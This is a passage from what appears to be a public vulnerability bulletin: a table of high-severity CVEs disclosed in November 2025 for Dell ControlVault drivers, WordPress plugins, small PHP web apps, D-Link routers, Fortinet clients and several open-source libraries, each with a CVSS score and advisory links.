| Broadcom--BCM5820X | A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an api call to trigger this vulnerability. | 2025-11-17 | 8.7 | CVE-2025-31361 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2174   |
| Broadcom--BCM5820X | A hard-coded password vulnerability exists in the ControlVault WBDI Driver functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to execute priviledged operation. An attacker can issue an api call to trigger this vulnerability. | 2025-11-17 | 8.7 | CVE-2025-31649 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2173   |
| Broadcom--BCM5820X | A buffer overflow vulnerability exists in the CvManager_SBI functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to a arbitrary code execution. An attacker can issue an api call to trigger this vulnerability. | 2025-11-17 | 8.8 | CVE-2025-32089 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2188   |
| Broadcom--BCM5820X | A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. | 2025-11-17 | 8.8 | CVE-2025-36553 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2189   |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 2 (`WBIO_USH_GET_IDENTITY`) with an improper `ReceiveBuferSize` value. | 2025-11-17 | 7.3 | CVE-2025-36460 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175   |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 0 (`WBIO_USH_GET_TEMPLATE`) and with either and an invalid `ReceiveBuferSize` and/or an invalid `SendBufferSize`. | 2025-11-17 | 7.3 | CVE-2025-36461 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175   |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 3 (`WBIO_USH_CREATE_CHALLENGE`) with an invalid `ReceiveBuferSize`. | 2025-11-17 | 7.3 | CVE-2025-36462 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175   |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 4 (`WBIO_USH_ADD_RECORD`) and with an invalid `SendBufferSize`. | 2025-11-17 | 7.3 | CVE-2025-36463 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175   |
| bww--URL Image Importer | The URL Image Importer plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.0.6. This is due to the plugin relying on a user-controlled Content-Type HTTP header to validate file uploads in the 'uimptr_import_image_from_url()' function which writes the file to the server before performing proper validation. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible via the uploaded PHP file. | 2025-11-21 | 8.8 | CVE-2025-12138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1da18430-1bd0-4f63-9e22-5d26de2be410?source=cve https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L198 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1319 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1353 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1358 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395852%40url-image-importer&new=3395852%40url-image-importer&sfp_email=&sfph_mail=#file9   |
| Campcodes--Online Polling System | A flaw has been found in Campcodes Online Polling System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/checklogin.php. Executing manipulation of the argument myusername can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-11-23 | 7.3 | CVE-2025-13556 | VDB-333323 | Campcodes Online Polling System checklogin.php sql injection VDB-333323 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696614 | Campcodes Online Polling System V1.0 SQL Injection https://github.com/ProgramShowMaker/CVE/issues/2 https://www.campcodes.com/   |
| Campcodes--Online Polling System | A vulnerability has been found in Campcodes Online Polling System 1.0. Affected by this issue is some unknown functionality of the file /registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 7.3 | CVE-2025-13557 | VDB-333324 | Campcodes Online Polling System registeracc.php sql injection VDB-333324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696615 | Campcodes Online Polling System V1.0 SQL Injection https://github.com/ProgramShowMaker/CVE/issues/3 https://www.campcodes.com/   |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability has been found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected is an unknown function of the file /admin/receipt.php. Such manipulation of the argument tid leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-11-19 | 7.3 | CVE-2025-13410 | VDB-332937 | Campcodes Retro Basketball Shoes Online Store receipt.php sql injection VDB-332937 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #693696 | campcodes Retro Basketball Shoes Online Store V1.0 SQL injection https://github.com/laosijivul/cve/issues/3 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A vulnerability was determined in Campcodes School Fees Payment Management System 1.0. This impacts an unknown function of the file /ajax.php?action=login. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13271 | VDB-332606 | Campcodes School Fees Payment Management System ajax.php sql injection VDB-332606 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690044 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/18 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. Affected is an unknown function of the file /manage_course.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-11-17 | 7.3 | CVE-2025-13272 | VDB-332607 | Campcodes School Fees Payment Management System manage_course.php sql injection VDB-332607 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690046 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/19 https://www.campcodes.com/   |
| Campcodes--School File Management System | A vulnerability was detected in Campcodes School File Management System 1.0. Affected is an unknown function of the file /index.php of the component Login. Performing manipulation of the argument stud_no results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-11-23 | 7.3 | CVE-2025-13555 | VDB-333322 | Campcodes School File Management System Login index.php sql injection VDB-333322 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696516 | Campcodes School File Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/4 https://www.campcodes.com/   |
| Campcodes--Supplier Management System | A vulnerability was found in Campcodes Supplier Management System 1.0. This affects an unknown part of the file /manufacturer/confirm_order.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-11-17 | 7.3 | CVE-2025-13291 | VDB-332632 | Campcodes Supplier Management System confirm_order.php sql injection VDB-332632 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691620 | Campcodes Campcodes Supplier Management System V1.0 SQL Injection https://github.com/Fex212/CVE/issues/1 https://www.campcodes.com/   |
| Campcodes--Supplier Management System | A security vulnerability has been detected in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /index.php of the component Login. Such manipulation of the argument txtUsername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-11-23 | 7.3 | CVE-2025-13554 | VDB-333321 | Campcodes Supplier Management System Login index.php sql injection VDB-333321 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696515 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber060/CVE/issues/3 https://www.campcodes.com/   |
| Chunghwa Telecom--TenderDocTransfer | TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system. | 2025-11-17 | 8.1 | CVE-2025-13282 | https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html   |
| Chunghwa Telecom--TenderDocTransfer | TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes. | 2025-11-17 | 7.1 | CVE-2025-13283 | https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html   |
| code-projects--Nero Social Networking Site | A flaw has been found in code-projects Nero Social Networking Site 1.0. This issue affects some unknown processing of the file /friendsphoto.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-11-17 | 7.3 | CVE-2025-13277 | VDB-332612 | code-projects Nero Social Networking Site friendsphoto.php sql injection VDB-332612 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690140 | code-projects Nero Social Networking Site 1.0 SQL Injection https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_004 https://code-projects.org/   |
| code-projects--Online Shop Project | A vulnerability was found in code-projects Online Shop Project 1.0. This issue affects some unknown processing of the file /login.php. The manipulation of the argument Password results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-11-20 | 7.3 | CVE-2025-13449 | VDB-333019 | code-projects Online Shop Project login.php sql injection VDB-333019 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694653 | SourceCodester Online Shop Project V1.0 SQL Injection https://github.com/xiaojuzirr/cve/issues/3 https://code-projects.org/   |
| code-projects--Simple Pizza Ordering System | A security flaw has been discovered in code-projects Simple Pizza Ordering System 1.0. Affected is an unknown function of the file /listorder.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-11-18 | 7.3 | CVE-2025-13323 | VDB-332662 | code-projects Simple Pizza Ordering System listorder.php sql injection VDB-332662 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691844 | code-projects Simple Pizza Ordering System 1.0 SQL Injection https://github.com/daojian1/Simple-Pizza-Ordering-System_V1.0_003 https://code-projects.org/   |
| CodeAstro--Simple Inventory System | A vulnerability was determined in CodeAstro Simple Inventory System 1.0. The impacted element is an unknown function of the file /index.php of the component Login. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13280 | VDB-332615 | CodeAstro Simple Inventory System Login index.php sql injection VDB-332615 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691380 | codeastro Simple Inventory System V1.0 SQL Injection https://github.com/umu123456/cvesimpleInventorysystem/issues/1 https://codeastro.com/   |
| codehub666--94list | A security flaw has been discovered in codehub666 94list up to 5831c8240e99a72b7d3508c79ef46ae4b96befe8. The impacted element is the function Login of the file /function.php. The manipulation results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. | 2025-11-19 | 7.3 | CVE-2025-13395 | VDB-332923 | codehub666 94list function.php login sql injection VDB-332923 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692095 | github 94list (Current release) SQL Injection https://github.com/codehub666/94list/issues/63 https://github.com/codehub666/94list/issues/63#issue-3607918945   |
| codepeople--CP Contact Form with PayPal | The CP Contact Form with PayPal plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.56. This is due to the plugin exposing an unauthenticated IPN-like endpoint (via the 'cp_contactformpp_ipncheck' query parameter) that processes payment confirmations without any authentication, nonce verification, or PayPal IPN signature validation. This makes it possible for unauthenticated attackers to mark form submissions as paid without making actual payments by sending forged payment notification requests with arbitrary POST data (payment_status, txn_id, payer_email). | 2025-11-22 | 7.5 | CVE-2025-13384 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6639c3d8-8f26-4ee5-8c4b-2efcf34668a2?source=cve https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L541 https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L877 https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L925 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399104%40cp-contact-form-with-paypal&new=3399104%40cp-contact-form-with-paypal&sfp_email=&sfph_mail=   |
| codesnippetspro--Code Snippets | The Code Snippets plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 3.9.1. This is due to the plugin's use of extract() on attacker-controlled shortcode attributes within the `evaluate_shortcode_from_flat_file` method, which can be used to overwrite the `$filepath` variable and subsequently passed to require_once. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server via the `[code_snippet]` shortcode using PHP filter chains granted they can trick an administrator into enabling the "Enable file-based execution" setting and creating at least one active Content snippet. | 2025-11-19 | 8 | CVE-2025-13035 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7c7247c-2fc3-46ff-858e-2242b7211476?source=cve https://plugins.trac.wordpress.org/browser/code-snippets/tags/3.8.1/php/front-end/class-front-end.php#L295 https://plugins.trac.wordpress.org/browser/code-snippets/tags/3.8.1/php/front-end/class-front-end.php#L296 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397635%40code-snippets%2Ftrunk&old=3395415%40code-snippets%2Ftrunk&sfp_email=&sfph_mail=#file23   |
| D-Link--DIR-822K | A flaw has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This affects an unknown part of the file /boafrm/formDdns. This manipulation of the argument submit-url causes memory corruption. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-11-23 | 8.8 | CVE-2025-13547 | VDB-333314 | D-Link DIR-822K/DWR-M920 formDdns memory corruption VDB-333314 | CTI Indicators (IOB, IOC, IOA) Submit #693758 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695428 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/30 https://github.com/QIU-DIE/CVE/issues/42 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This vulnerability affects unknown code of the file /boafrm/formFirewallAdv. Such manipulation of the argument submit-url leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 8.8 | CVE-2025-13548 | VDB-333315 | D-Link DIR-822K/DWR-M920 formFirewallAdv buffer overflow VDB-333315 | CTI Indicators (IOB, IOC, IOA) Submit #693767 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695433 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/31 https://github.com/QIU-DIE/CVE/issues/43 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was found in D-Link DIR-822K 1.00. This issue affects the function sub_455524 of the file /boafrm/formNtp. Performing manipulation of the argument submit-url results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-11-23 | 8.8 | CVE-2025-13549 | VDB-333316 | D-Link DIR-822K formNtp sub_455524 buffer overflow VDB-333316 | CTI Indicators (IOB, IOC, IOA) Submit #693776 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow https://github.com/QIU-DIE/CVE/issues/32 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was determined in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. Impacted is an unknown function of the file /boafrm/formVpnConfigSetup. Executing manipulation of the argument submit-url can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 8.8 | CVE-2025-13550 | VDB-333317 | D-Link DIR-822K/DWR-M920 formVpnConfigSetup buffer overflow VDB-333317 | CTI Indicators (IOB, IOC, IOA) Submit #693777 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695437 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/33 https://github.com/QIU-DIE/CVE/issues/47 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was identified in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. The affected element is an unknown function of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-11-23 | 8.8 | CVE-2025-13551 | VDB-333318 | D-Link DIR-822K/DWR-M920 formWanConfigSetup buffer overflow VDB-333318 | CTI Indicators (IOB, IOC, IOA) Submit #693785 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695436 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/35 https://github.com/QIU-DIE/CVE/issues/46 https://www.dlink.com/   |
| D-Link--DIR-822K | A security flaw has been discovered in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. The impacted element is an unknown function of the file /boafrm/formWlEncrypt. The manipulation of the argument submit-url results in buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-11-23 | 8.8 | CVE-2025-13552 | VDB-333319 | D-Link DIR-822K/DWR-M920 formWlEncrypt buffer overflow VDB-333319 | CTI Indicators (IOB, IOC, IOA) Submit #693803 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695434 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/36 https://github.com/QIU-DIE/CVE/issues/44 https://www.dlink.com/   |
| D-Link--DIR-852 | A vulnerability was identified in D-Link DIR-852 1.00. This issue affects some unknown processing of the file /gena.cgi. Such manipulation of the argument service leads to command injection. The attack can be executed remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-11-23 | 7.3 | CVE-2025-13562 | VDB-333327 | D-Link DIR-852 gena.cgi command injection VDB-333327 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697063 | D-Link DIR-852 1.00 Command Injection https://github.com/YZS17/CVE/blob/main/DLink/DLink-DIR852/RCE2.md https://www.dlink.com/   |
| D-Link--DWR-M920 | A security flaw has been discovered in D-Link DWR-M920, DWR-M921, DWR-M960, DWR-M961 and DIR-825M 1.01.07/1.1.47. This vulnerability affects unknown code of the file /boafrm/formPingDiagnosticRun. Performing manipulation of the argument host results in buffer overflow. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 8.8 | CVE-2025-13304 | VDB-332644 | D-Link DWR-M920/DWR-M921/DWR-M960/DWR-M961/DIR-825M formPingDiagnosticRun buffer overflow VDB-332644 | CTI Indicators (IOB, IOC, IOA) Submit #691808 | D-Link DWR-M960 V1.01.07 Buffer Overflow Submit #691810 | D-Link DWR-M961 V1.1.47 Buffer Overflow (Duplicate) Submit #691812 | D-Link DWR-M921 V1.1.50 Buffer Overflow (Duplicate) Submit #691817 | D-Link DWR-M920 V1.1.5 Buffer Overflow (Duplicate) Submit #691821 | D-Link DIR-825m V1.1.12 Buffer Overflow (Duplicate) https://github.com/LX-LX88/cve/issues/11 https://www.dlink.com/   |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920, DWR-M921, DWR-M960, DIR-822K and DIR-825M 1.01.07. This issue affects some unknown processing of the file /boafrm/formTracerouteDiagnosticRun. Executing manipulation of the argument host can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 8.8 | CVE-2025-13305 | VDB-332645 | D-Link DWR-M920/DWR-M921/DWR-M960/DIR-822K/DIR-825M formTracerouteDiagnosticRun buffer overflow VDB-332645 | CTI Indicators (IOB, IOC, IOA) Submit #691809 | D-Link DWR-M960 V1.01.07 Buffer Overflow Submit #691816 | D-Link DWR-M920 V1.1.5 Buffer Overflow (Duplicate) Submit #693784 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow (Duplicate) Submit #693806 | D-Link DWR-M921 V1.1.50 Buffer Overflow (Duplicate) Submit #695424 | D-Link DIR-825m v1.1.12 Buffer Overflow (Duplicate) https://github.com/LX-LX88/cve/issues/12 https://www.dlink.com/   |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920 1.1.50. This affects the function sub_41C7FC of the file /boafrm/formPinManageSetup. This manipulation of the argument submit-url causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-23 | 8.8 | CVE-2025-13553 | VDB-333320 | D-Link DWR-M920 formPinManageSetup sub_41C7FC buffer overflow VDB-333320 | CTI Indicators (IOB, IOC, IOA) Submit #695435 | D-Link DWR-M920 v1.1.50 Buffer Overflow https://github.com/QIU-DIE/CVE/issues/45 https://www.dlink.com/   |
| dajiaji--hpke-js | hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5. | 2025-11-21 | 9.1 | CVE-2025-64767 | https://github.com/dajiaji/hpke-js/security/advisories/GHSA-73g8-5h73-26h4 https://github.com/dajiaji/hpke-js/commit/94a767c9b9f37ce48d5cd86f7017d8cacd294aaf https://github.com/dajiaji/hpke-js/blob/b7fd3592c7c08660c98289d67c6bb7f891af75c4/packages/core/src/senderContext.ts#L22-L34   |
| devcode-it--openstamanager | OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5. | 2025-11-19 | 8.8 | CVE-2025-65103 | https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has a Denial of service vulnerability, allowing unauthenticated remote attackers to send specific requests that result in denial of web service. | 2025-11-17 | 7.5 | CVE-2025-13165 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Eksagate Electronic Engineering and Computer Industry Trade Inc.--Webpack Management System | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eksagate Electronic Engineering and Computer Industry Trade Inc. Webpack Management System allows SQL Injection.This issue affects Webpack Management System: through 20251119. | 2025-11-19 | 9.8 | CVE-2025-10437 | https://www.usom.gov.tr/bildirim/tr-25-0401   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the eh_crm_new_ticket_post() function in all versions up to, and including, 3.3.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-21 | 9.8 | CVE-2025-11456 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a6f362c1-fe64-4be1-9713-14c0561a59ce?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-three.php?rev=3332203 https://wordpress.org/plugins/elex-helpdesk-customer-support-ticket-system/ https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-three.php   |
| esm-dev--esm.sh | esm.sh is a nobuild content delivery network(CDN) for modern web development. Prior to version 136, the esm.sh CDN service is vulnerable to path traversal during NPM package tarball extraction. An attacker can craft a malicious NPM package containing specially crafted file paths (e.g., package/../../tmp/evil.js). When esm.sh downloads and extracts this package, files may be written to arbitrary locations on the server, escaping the intended extraction directory. This issue has been patched in version 136. | 2025-11-19 | 8.2 | CVE-2025-65025 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-h3mw-4f23-gwpw https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16   |
| flothemesplugins--Flo Forms Easy Drag & Drop Form Builder | The Flo Forms - Easy Drag & Drop Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.0.43. This is due to the plugin allowing SVG file uploads via an unauthenticated AJAX endpoint (`flo_form_submit`) without proper file content validation. This makes it possible for unauthenticated attackers to upload malicious SVG files containing JavaScript that executes when an administrator views the uploaded file in the WordPress admin interface, leading to potential full site compromise. | 2025-11-21 | 7.1 | CVE-2025-13159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8c529017-2fb9-4665-97a6-3ec062908299?source=cve https://plugins.trac.wordpress.org/browser/flo-forms/trunk/includes/class-flo-forms.php#L301 https://plugins.trac.wordpress.org/browser/flo-forms/trunk/public/class-flo-forms-public.php#L502 https://plugins.trac.wordpress.org/browser/flo-forms/trunk/admin/class-flo-forms-admin.php#L821   |
| Fortinet--FortiClientWindows | A Heap-based Buffer Overflow vulnerability [CWE-122] in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.8 may allow an authenticated local IPSec user to execute arbitrary code or commands via "fortips_74.sys". The attacker would need to bypass the Windows heap integrity protections | 2025-11-18 | 7.1 | CVE-2025-46373 | https://fortiguard.fortinet.com/psirt/FG-IR-25-125   |
| Fortinet--FortiClientWindows | An Exposed IOCTL with Insufficient Access Control vulnerability [CWE-782] in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.9 may allow an authenticated local user to execute unauthorized code via fortips driver. Success of the attack would require bypassing the Windows memory protections such as Heap integrity and HSP. In addition, it requires a valid and running VPN IPSec connection. | 2025-11-18 | 7.1 | CVE-2025-47761 | https://fortiguard.fortinet.com/psirt/FG-IR-25-112   |
| Fortinet--FortiVoice | An improper neutralization of special elements used in an SQL Command ("SQL Injection") vulnerability [CWE-89] in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 allows an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests. | 2025-11-18 | 7.7 | CVE-2025-58692 | https://fortiguard.fortinet.com/psirt/FG-IR-25-666   |
| freeprojectscodes--Sports Club Management System | A vulnerability was detected in freeprojectscodes Sports Club Management System 1.0. The affected element is an unknown function of the file /dashboard/admin/change_s_pwd.php. Performing manipulation of the argument login_id results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-11-19 | 7.3 | CVE-2025-13422 | VDB-332944 | freeprojectscodes Sports Club Management System change_s_pwd.php sql injection VDB-332944 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696004 | freeprojectscodes Sports Club Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/10   |
